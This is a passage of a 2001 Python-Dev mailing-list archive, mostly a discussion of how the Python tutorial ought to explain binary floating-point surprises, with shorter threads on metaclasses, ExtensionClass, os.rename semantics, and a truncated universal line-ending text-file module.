e > 0: top <<= e e = 0 elif e < 0: # Exact is top/2**-e. Multiply top and bottom by 5**-e to # get top*5**-e/10**-e = top*5**-e * 10**e top *= 5L**-e # Nuke trailing (decimal) zeroes. while 1: assert top > 0 newtop, rem = divmod(top, 10L) if rem: break top = newtop e += 1 return "%s%de%d" % (sign, top, e) From guido at digicool.com Mon May 21 21:02:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 15:02:43 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT." References: Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com> > Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: > so long as we rely on the platform C to format floats, the output isn't > well-defined (the last digit or so can and will vary across boxes). I can't check right now, but I thought that this was pretty consistent across some common platforms? > I can certainly explain that this is so, and even why, but unsure > the tutorial is the right place for it. In any case the tutorial > shouldn't be giving examples whose output is platform-dependent. > For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour > the tutorial for all such cases? Are you serious? This is something that the newbie wou is in the least bit adventurous will run into anyway, so I don't think that not talking about this at all in the tutorial is fair or helpful. That just perpetuates the questions from newbies about "floating point is broken" -- since none of the tutorial examples prepare them for this. Since this is behavior that is ordinarily observed and perpetually perplexing, I think it *must* be treated in the tutorial. The tutorial doesn't have to have the full explanation -- maybe it's enough to say something like ``due to round-off errors you will sometimes see inexact results like 31.400000000000002; don't worry about this, you can use str() or "%g" (but not round()!) to strip redundant precision, and here's a URL for more info.'' Or maybe the full story can be an appendix. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:09:04 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:09:04 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net> Guido van Rossum wrote: > > Or maybe the full story can be an appendix. Or maybe Decimal should go in the standard distribution? What kind of deadline do I have for finishing that to go into 2.2? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido at digicool.com Mon May 21 22:35:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:35:10 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT." <20010521200904.05CAE99C81@waltz.rahul.net> References: <20010521200904.05CAE99C81@waltz.rahul.net> Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com> > > Or maybe the full story can be an appendix. > > Or maybe Decimal should go in the standard distribution? What kind of > deadline do I have for finishing that to go into 2.2? Adding Decimal to the distribution is fine. But using it by default for floating point literals and other floating point results is a different story. The PEP about that hasn't really been discussed enough to make a decision, but a conservative estimate is that this change won't be made in 2.2. So Decimal doesn't solve the problem the tutorial has. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:42:15 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:42:15 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM Message-ID: <20010521204215.F216699C81@waltz.rahul.net> Guido van Rossum wrote: > >>> Or maybe the full story can be an appendix. >> >> Or maybe Decimal should go in the standard distribution? What kind of >> deadline do I have for finishing that to go into 2.2? > > Adding Decimal to the distribution is fine. But using it by default > for floating point literals and other floating point results is a > different story. The PEP about that hasn't really been discussed > enough to make a decision, but a conservative estimate is that this > change won't be made in 2.2. So Decimal doesn't solve the problem the > tutorial has. Wasn't thinking of going quite that far, only changing the tutorial to say something like, "If you want speed, use the hardware FP (which is directly supported by Python's floating literals); if you want accuracy, use Decimal." (Or FixedPoint, which is already in the distribution.) The full story needn't go in the Appendix; we can simply refer people to Cowlishaw and Kahan. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido at digicool.com Mon May 21 22:57:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:57:08 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT." <20010521204215.F216699C81@waltz.rahul.net> References: <20010521204215.F216699C81@waltz.rahul.net> Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com> [Aahz] > >>> Or maybe the full story can be an appendix. > >> > >> Or maybe Decimal should go in the standard distribution? What kind of > >> deadline do I have for finishing that to go into 2.2? [Guido] > > Adding Decimal to the distribution is fine. But using it by default > > for floating point literals and other floating point results is a > > different story. The PEP about that hasn't really been discussed > > enough to make a decision, but a conservative estimate is that this > > change won't be made in 2.2. So Decimal doesn't solve the problem the > > tutorial has. [Aahz] > Wasn't thinking of going quite that far, only changing the tutorial to > say something like, "If you want speed, use the hardware FP (which is > directly supported by Python's floating literals); if you want accuracy, > use Decimal." (Or FixedPoint, which is already in the distribution.) > The full story needn't go in the Appendix; we can simply refer people to > Cowlishaw and Kahan. I think that most people don't care about either speed or accuracy, but (being Python users) everybody cares about convenience, and convenience is using the built-in floating point literals. (Also, most other modules returning or using floating point numbers use binary floating point, e.g. the time module and of course the math module.) As long as the built-in literals are binary floating point, they are what 99% of the code uses, so we need to explain the pitfalls. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at cj42289-a.reston1.va.home.com Mon May 21 23:47:35 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Mon, 21 May 2001 17:47:35 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental updates to the Python 2.2 documentation. From tim at digicool.com Mon May 21 23:57:22 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 17:57:22 -0400 Subject: [Python-Dev] FP vs. tutorial Message-ID: Let's get some errors cleared up first: + FixedPoint is not in the distribution. + There is no PEP for Decimal. + Decimal f.p. is not more accurate than binary f.p. In fact, it's provably worse (but not by much). For the rest, + Yes, I'm serious about not including tutorial examples with platform-dependent output, unless they're explicitly meant to illustrate non-portable code. + Specific small examples notwithstanding, there is no uniformity across platforms in the last digit or so, because not even the IEEE- 754 standard requires that (while C is much sloppier than 754), and vendors generally don't implement anything better than the minimum necessary when it comes to f.p. (Sun is a notable exception). + Happy to add text explaining the existence of surprises, and providing a URL. Do the floating-point morons on Python-Dev find this one comprehensible?: http://www.lahey.com/float.htm From guido at digicool.com Tue May 22 00:33:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 18:33:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT." References: Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com> > + Yes, I'm serious about not including tutorial examples with > platform-dependent output, unless they're explicitly meant to > illustrate non-portable code. Sure. Most examples can be rewritten to avoid platform-dependent output. But there should be one section on floating-point inaccuracies that shows a few of the kind of things you can expect on a typical platform, and 1.1 -> 1.1000000000000001 is pretty common. > + Specific small examples notwithstanding, there is no uniformity > across platforms in the last digit or so, because not even the IEEE- > 754 standard requires that (while C is much sloppier than 754), and > vendors generally don't implement anything better than the minimum > necessary when it comes to f.p. (Sun is a notable exception). So we'll have to add something like "the actual inexact output you see may differ from the inexact output in this example". > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I was thinking more of immortalizing this one: http://www.python.org/cgi-bin/moinmoin/RepresentationError This can serve as a nice self-contained section on f.p. surprises. --Guido van Rossum (home page: http://www.python.org/~guido/) From MarkH at ActiveState.com Tue May 22 01:06:39 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:06:39 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com> Message-ID: > > + Happy to add text explaining the existence of surprises, and > > providing a URL. Do the floating-point morons on Python-Dev > > find this one comprehensible?: Hey - I resemble that remark! > > http://www.lahey.com/float.htm I quite liked the tone of this note. The Python-dev morons probably could make good sense of this, but only due to the relentless persistence of a certain timbot. If not for Tim, I would have forgotten completely about binary floating point versus decimal floating point. IIRC, me and about 40 other guys were desperately trying to get the attention of the single CS female on the day that lecture was given. (Actually, that is a pretty safe bet - _all_ lectures were spent that way :) However, without a little additional background I doubt the masses would be able to get too far into this. As Tim has said a few times, most people wont care - they just want it to work! > I was thinking more of immortalizing this one: > > http://www.python.org/cgi-bin/moinmoin/RepresentationError IMO, this is a little worse. There is less "background". Eg, in almost the first paragraph we see: """ Rewriting 1 J --- ~= ---- 10 2**N """ And I went "huh? Where did j and N spring from?". Reading a bit further made it clear, but this document did seem a little impenetrable to floating point or maths newbies. It seems to me that the RepresentationError document was written for people with a decent background in maths - exactly the sort of people who _don't_ need such a document. Just-my-0.020000002-cents-worth ly, Mark. From jeremy at digicool.com Tue May 22 01:13:09 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 21 May 2001 19:13:09 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <15113.41221.839653.822246@slothrop.digicool.com> We looked at the SecondImport test case today. It's a good test case for programs that execute "import os" in a time-critical inner loop :-). The primary reason it is slower is the import lock that was added after 1.5.2. The benchmark, run in isolation, spends about 6 percent of its time in the locking code. Since it only spends about 20 percent of its time actually doing imports, this is a pretty substantial cost. It seems possible to eliminate some of the cost by using a special marker in sys.modules that means: "This is not a module, but it's being loaded by another thread." But Guido doesn't sound interested in optimizing programs with imports in inner loops. Jeremy From tim at digicool.com Tue May 22 01:20:16 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 19:20:16 -0400 Subject: [Python-Dev] test_mailbox now fails on Windows Message-ID: Appears to be because new code uses os.link, which doesn't exist on Windows. BTW, test_urllib2.py is still failing on Windows (and has been for a couple of weeks). From michel at digicool.com Tue May 22 01:42:49 2001 From: michel at digicool.com (Michel Pelletier) Date: Mon, 21 May 2001 16:42:49 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Mark Hammond wrote: > > > + Happy to add text explaining the existence of surprises, and > > > providing a URL. Do the floating-point morons on Python-Dev > > > find this one comprehensible?: > > Hey - I resemble that remark! As they say in the south, "mah-self" > > > http://www.lahey.com/float.htm > > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. I liked the tone too, but it really goes into a lot of detail, there's this problem, and that one, oh and also *this* one and then there's *that* and the other thing, and after a while you get the impression that floating-point is for the insane. > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys were > desperately trying to get the attention of the single CS female on the day > that lecture was given. (Actually, that is a pretty safe bet - _all_ > lectures were spent that way :) The funny thing about that is we were in *Long Beach* (I assume you mean IPC9), if you wanted to see beautiful, scarcely clothed women in an acceptable public venue you woudn't have had to go far, and they would have probably had more interesting "significant bits" (it's none of anyones business where *I* was during the lectures ;). Someone on the Zope list proposed P4W (Python for Women). Poor, desperate souls. Obviously, P4E includes them too!! > > I was thinking more of immortalizing this one: > > > > http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. I agree. Equations should not be needed to explain this. -Michel From MarkH at ActiveState.com Tue May 22 01:47:06 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:47:06 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: > > The funny thing about that is we were in *Long Beach* (I > assume you mean IPC9), if you wanted to see beautiful, scarcely clothed Actually, I meant the computer science lectures all those years ago. Literally one female. And-not-much-has-changed ly, Mark. From guido at digicool.com Tue May 22 05:22:40 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:22:40 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000." References: Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com> Hi Alan, Thanks a lot for your input. I am cc'ing this reply to python-dev because I think my reply will be interesting for others. (Python-dev'ers: Alan expressed concern that introducing Smalltalk metaclasses would make Python unnecessarily complicated.) The way my thinking is currently going, it's not likely that Python will get a metaclass system similar to Smalltalk. However, unifying types and classes is useful for other reasons: please go to http://python.sourceforge.net/peps/ to read PEP 252 which explains how introspection can become simpler and more powerful by unifying the introspection mechanisms for types and classes. There will still be metaclasses, but the metaclasses will be less important than in Smalltalk. Class methods as commonly seen in Smalltalk are not high on my priority list, and the metaclass hierarchy won't be parallelling the regular class hierarchy. Instead, most metaclass programming will be done in C by programmers who want to implement alternative class policies. For example, the current class implementation gives each class a __dict__ for methods and class variables, and dynamically searches the class hierarchy for methods. An alternative inheritance policy could merge the __dict__ of the base class(es) with the __dict__ of the derived class at class declaration time: this would make method lookup a single dict lookup no matter how many levels of base classes are involved, at the cost of making classes less dynamic, because a change to a base class won't be seen in a derived class. A metaclass controls method lookup and class construction, and thus a different metaclass can be used to change this policy for selected class hierarchies without changing the default policy (which would be backwards incompatible). Other policies under control of a metaclass could include overriding hooks for getattr and setattr, alternative mechanisms to store instance variables (e.g. slot-based rather than dict-based), and so on. While I think I can make it possible to write metaclasses in pure Python (by subclassing types.TypeType), I expect that most metaprogramming will be done in C, for performance reasons and for maximum flexibility. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 22 05:55:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:55:26 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT." References: Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com> > [Guido] > > I would like to break this down by defining the mapping between cmp() > > and rich comparisons. [Tim] > Good idea! Followed by many nitpicking questions about what I meant. As a matter of process, I think it's better to try to channel instead of challenge me. I just don't seem to have the concentration necessary to come up with all the details needed to make this worthy of a language definition, and you do. If you want a BDFL proclamation on currently gray areas in the rules, or a reversal of what the current implementation does in some cases, please draft a definition with a few leading questions. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 22 06:02:18 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 00:02:18 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Mark Hammond, on http://www.lahey.com/float.htm] > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. > > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys > were desperately trying to get the attention of the single CS female on > the day that lecture was given. (Actually, that is a pretty safe bet - > _all_ lectures were spent that way :) I remember guys like you. Well guess what? You ended up with a baby, while I'm known on two continents as the author of tabnanny.py. Ha! Revenge is a dish best eaten cold . > However, without a little additional background I doubt the masses would > be able to get too far into this. There's only so much you can say to unmotivated people who are also unwilling to learn. That's not my problem. Finding them a gentle intro from which they *could* learn isn't either, but typing a URL is easy enough that I don't mind. Here: I want to script MS Word with Python. I don't know COM and refuse to learn anything about it. I'd rather not install win32all either, and import statements confuse me. Why don't you make it easy for me? It's the same thing -- you can point them at what they need to learn if they're serious, else they're simply out of luck. [And on] >> http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. In one sense it's much worse: it's only trying to explain a single cause of fp surprises. OTOH, it explains it precisely while giving the reader the tools needed to do an exact analysis of any case of that particular class. The Lahey link touches on all the common sources of surprises, but leaves them fuzzy. > There is less "background". Eg, in almost the first paragraph we see: > > """ > Rewriting > 1 J > --- ~= ---- > 10 2**N > """ > > And I went "huh? Where did j and N spring from?". Reading a bit further > made it clear, but this document did seem a little impenetrable to > floating point or maths newbies. It did its job for them if it simply scared them <0.5 wink>. > It seems to me that the RepresentationError document was written for > people with a decent background in maths - There's nothing more complicated than integer division there. > exactly the sort of people who _don't_ need such a document. They actually do: regardless of math background, nothing about f.p. is obvious before studying f.p. as a subject in its own right. It's "not like" anything else, and in previous lives I spent a good chunk of my work time explaining the same stuff to doctorates. Mathematicians were actually the hardest audience at first, perhaps because they had the hardest time admitting they didn't already understand it; after getting beyond bruised professional pride, though, they were the easiest audience to bring up to speed. From tim at digicool.com Tue May 22 06:58:21 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 22 May 2001 00:58:21 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Michel Pelletier, on http://www.lahey.com/float.htm] > I liked the tone too, but it really goes into a lot of detail, there's > this problem, and that one, oh and also *this* one and then there's > *that* and the other thing, and after a while you get the impression > that floating-point is for the insane. Using an unfamiliar power tool with sharp edges, and while blindfolded, is insane. [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > I agree. Equations should not be needed to explain this. There's exactly one equation on that page, saying that one ratio of two integers is approximately equal to another ratio of two integers. If that's too much for you, and you weren't satisfied with the *initial* hand-wavy explanation ("1/10 is not exactly representable as a binary fraction") either, then it's up to you to do better than the latter without actually saying anything useful : Q: Why is Python broken: >>> 0.1 0.10000000000000001 A: [your turn] From gward at python.net Tue May 22 15:41:57 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 09:41:57 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: ; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400 References: Message-ID: <20010522094157.A1245@gerg.ca> On 21 May 2001, Tim Peters said: > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I found this article more useful, interesting, and informative than whatever I learned about binary floating-point in my academic years. Good link, Tim. Two catches: * I can just barely follow the FORTRAN examples; I very much doubt the average Python newbie would have any more luck than me * I tried several of the FORTRAN examples in Python, and did not witness any of the gotchas they are meant to illustrate. Possibly it's just single-precision vs. double-precision difference, but Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 doesn't demonstrate the same gotchas as that article does. Greg -- Greg Ward - geek gward at python.net http://starship.python.net/~gward/ Ban the bomb -- save the world for conventional warfare. From skip at pobox.com Tue May 22 18:01:40 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 11:01:40 -0500 Subject: [Python-Dev] type/class unification and ExtensionClass Message-ID: <15114.36196.4677.99240@beluga.mojam.com> I know Guido has recently been working on some of the type/class unification issues (PEPs 252 and 253). Will this affect ExtensionClass? In particular, will it go away or have to be reworked significantly for Python 2.2 or 2.3? The new PyGtk wrappers use the ExtensionClass module. I'm curious about how hard it would be to move away from ExtensionClass for these wrappers. My reading of PEP 253 suggests this shouldn't be too difficult. I'd ask Guido directly, but I figure other people on this list might also have useful input on the issue and/or be able to answer, saving him the time. At any rate, he will see it posted here just the same. Thx, Skip From guido at digicool.com Tue May 22 18:23:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 12:23:52 -0400 Subject: [Python-Dev] type/class unification and ExtensionClass In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT." <15114.36196.4677.99240@beluga.mojam.com> References: <15114.36196.4677.99240@beluga.mojam.com> Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com> > I know Guido has recently been working on some of the type/class unification > issues (PEPs 252 and 253). And I'm not done yet. :-) > Will this affect ExtensionClass? In particular, > will it go away or have to be reworked significantly for Python 2.2 or 2.3? Probably. Jim Fulton in particular asked me to work on this because he wants to phase out ExtensionClass. > The new PyGtk wrappers use the ExtensionClass module. I'm curious about how > hard it would be to move away from ExtensionClass for these wrappers. My > reading of PEP 253 suggests this shouldn't be too difficult. I don't think so either. > I'd ask Guido directly, but I figure other people on this list might also > have useful input on the issue and/or be able to answer, saving him the > time. At any rate, he will see it posted here just the same. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Tue May 22 23:44:09 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 14:44:09 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Tim Peters wrote: > [Michel Pelletier, on http://www.lahey.com/float.htm] > > I liked the tone too, but it really goes into a lot of detail, there's > > this problem, and that one, oh and also *this* one and then there's > > *that* and the other thing, and after a while you get the impression > > that floating-point is for the insane. > > Using an unfamiliar power tool with sharp edges, and while blindfolded, is > insane. I should have been more clear, I liked the first couple of paragraphs for their descriptions, and there is certainly nothing wrong with the document as it stands, but such an explanation would be a bit too lengthly and boring to a typical fifth grader or photoshop guru going through the Tutorial and dabbling in programming for the very first time. > [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > > > I agree. Equations should not be needed to explain this. > > There's exactly one equation on that page, saying that one ratio of two > integers is approximately equal to another ratio of two integers. Who was it that said every equation will halve your audience? I agree with that, the tutorial should try to be as broad and simple as possible. > If that's > too much for you, and you weren't satisfied with the *initial* hand-wavy > explanation ("1/10 is not exactly representable as a binary fraction") > either, then it's up to you to do better than the latter without actually > saying anything useful : The latter is fine, although I think the first document hand-waves better. -Michel From skip at pobox.com Tue May 22 23:54:42 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 16:54:42 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform Message-ID: <15114.57378.887742.531145@beluga.mojam.com> Couldn't figure out why this message never generated any comment. Turns out it didn't reach the list because the host I sent it from (dynamic4.tttech.com) couldn't be resolved. I just noticed it in my errors mailbox and am sending it out again. ------------------------------------------------------------------------------ It was brought to my attention a week ago by a client that os.rename semantics differ between Unix and Windows. On Unix, if the destination file already exists it is silently deleted. On Windows, an exception is raised. I was able to verify this for Python 2.0 on Windows98. I assume nothing changed for 2.1, but I can't verify that. (Windows trashed my partition table and my Linux root partition while I was downloading 2.1. Consequently, I no longer run Windows. Take that, Bill...) I haven't checked the Mac yet (will do that when I get back to the US), but I think that os.rename should have the same semantics across all platforms. To the extent reasonably possible, I think this should also be true of other common functions exposed through the os module. On the (unsupportable) theory that to-date, more Python apps have been written and/or deployed on Unix-like systems and that where Windows apps are concerned, many developers will have added a thin wrapper to mimic the Unix semantics, I think less breakage would result if the Unix semantics were implemented in the Windows version. It appears that is what POSIX compliance would demand as well. Skip From fdrake at acm.org Tue May 22 23:55:29 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 17:55:29 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com> Michel Pelletier writes: > as it stands, but such an explanation would be a bit too lengthly and > boring to a typical fifth grader or photoshop guru going through the > Tutorial and dabbling in programming for the very first time. But that's not the audience the Python Tutorial is targetted to -- readers are expected to be essentially competant in at least one "3rd generation" language. Maybe a few will shy away from a simple equation, but not so many. Those who do would do well to shy away from FP as well. ;-) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Wed May 23 00:04:11 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 18:04:11 -0400 (EDT) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> skip at pobox.com writes: > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were I don't know whether there are more deployed Python apps on Unix than on Windows (and I've no good idea about how to find out), but I think unifying the semantics one way or the other is a good thing. Regardless of which set of semantics is chosen. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 23 00:07:12 2001 From: mwh at python.net (Michael Hudson) Date: 22 May 2001 23:07:12 +0100 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)" References: Message-ID: Michel Pelletier writes: > Who was it that said every equation will halve your audience? It was Stephen Hawking's editor when he was preparing A Brief History Of Time (or at least, it gets mentioned in the preface; the advice may be older). Cheers, M. -- 7. It is easier to write an incorrect program than understand a correct one. -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html From jeremy at digicool.com Wed May 23 00:57:40 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 22 May 2001 18:57:40 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.61156.692322.674137@slothrop.digicool.com> >>>>> "MWH" == Michael Hudson writes: MWH> Michel Pelletier writes: >> Who was it that said every equation will halve your audience? MWH> It was Stephen Hawking's editor when he was preparing A Brief MWH> History Of Time (or at least, it gets mentioned in the preface; MWH> the advice may be older). There's a similar saw about excerpts of books in foreign languages. I believe I first read it in reference to Umberto Eco's Foucault's Pendulum, which starts with a full page of Hebrew. Jeremy From chrishbarker at home.net Wed May 23 01:21:01 2001 From: chrishbarker at home.net (Chris Barker) Date: Tue, 22 May 2001 16:21:01 -0700 Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line conversion? References: <20010414192445-r01010600-f8273ce6@213.84.27.177> Message-ID: <3B0AF45D.732126E6@home.net> Just van Rossum wrote: > Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't > seem to help focussing on actual content... > > Just Just (or anyone else) Have you made any progress on this PEP? I'd like to see it happen, so if you havn't done it, I'll try to find the time to make a start on it myself. I have written a simple class that impliments a line-ending-neutral text file class. I wrote it because I have a need for it, and I thought it would be a reasonable prototype for any syntax and methods we might want to use in an actual implimentation. I doubt anyone would find the methods I used particularly clean or elegant (or fast) but it's the first thing I've come up with, and it seems to work. I've enclosed the module with this email. If that doesn't work, let me know and I'll put it on a website. -Chris -- Christopher Barker, Ph.D. ChrisHBarker at home.net --- --- --- http://members.home.net/barkerlohmann ---@@ -----@@ -----@@ ------@@@ ------@@@ ------@@@ Oil Spill Modeling ------ @ ------ @ ------ @ Water Resources Engineering ------- --------- -------- Coastal and Fluvial Hydrodynamics -------------------------------------- ------------------------------------------------------------------------ -------------- next part -------------- #!/usr/bin/env python """ TextFile.py : a module that provides a UniversalTextFile class, and a replacement for the native python "open" command that provides an interface to that class. It would usually be used as: from TextFile import open then you can use the new open just like the old one (with some added flags and arguments) or import TextFile file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize]) """ import os ## Re-map the open function _OrigOpen = open def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""): """ A new open function, that returns a regular python file object for the old calls, and returns a new nifty universal text file when required. This works just like the regular open command, except that a new flag and a new parameter has been added. Call: file = open(filename,flags = "",bufsize = -1, LineEndingType = ""): - filename is the name of the file to be opened - flags is a string of one letter flags, the same as the standard open command, plus a "t" for universal text file. - - "b" means binary file, this returns the standard binary file object - - "t" means universal text file - - "r" for read only - - "w" for write. If there is both "w" and "t" than the user can specify a line ending type to be used with the LineEndingType parameter. - - "a" means append to existing file - bufsize specifies the buffer size to be used by the system. Same as the regular open function - LineEndingType is used only for writing (and appending) files, to specify a non-native line ending to be written. - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the characters themselves( "\r\n", etc. ). "native" will result in using the standard file object, which uses whatever is native for the system that python is running on. - LineBufferSize is the size of the buffer used to read data in a readline() operation. The default is currently set to 200 characters. If you will be reading files with many lines over 200 characters long, you should set this number to the largest expected line length. """ if "t" in flags: # this is a universal text file if ("w" in flags or "a" in flags) and LineEndingType == "native": return _OrigOpen(filename,flags.replace("t",""), bufsize) return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize) else: # this is a regular old file return _OrigOpen(filename,flags,bufsize) class UniversalTextFile: """ A class that acts just like a python file object, but has a mode that allows the reading of arbitrary formated text files, i.e. with either Unix, DOS or Mac line endings. [\n , \r\n, or \r] To keep it truly universal, it checks for each of these line ending possibilities at every line, so it should work on a file with mixed endings as well. """ def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""): self._file = _OrigOpen(filename,flags.replace("t","")+"b") LineEndingType = LineEndingType.lower() if LineEndingType == "native": self.LineSep = os.linesep() elif LineEndingType == "dos": self.LineSep = "\r\n" elif LineEndingType == "posix" or LineEndingType == "unix" : self.LineSep = "\n" elif LineEndingType == "mac": self.LineSep = "\r" else: self.LineSep = LineEndingType ## some attributes self.closed = 0 self.mode = flags self.softspace = 0 if LineBufferSize: self._BufferSize = LineBufferSize else: self._BufferSize = 100 def readline(self): start_pos = self._file.tell() ##print "Current file posistion is:", start_pos line = "" TotalBytes = 0 Buffer = self._file.read(self._BufferSize) while Buffer: ##print "Buffer = ",repr(Buffer) newline_pos = Buffer.find("\n") return_pos = Buffer.find("\r") if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line line = Buffer[:return_pos]+ "\n" TotalBytes = newline_pos+1 break elif ((return_pos < newline_pos) or newline_pos < 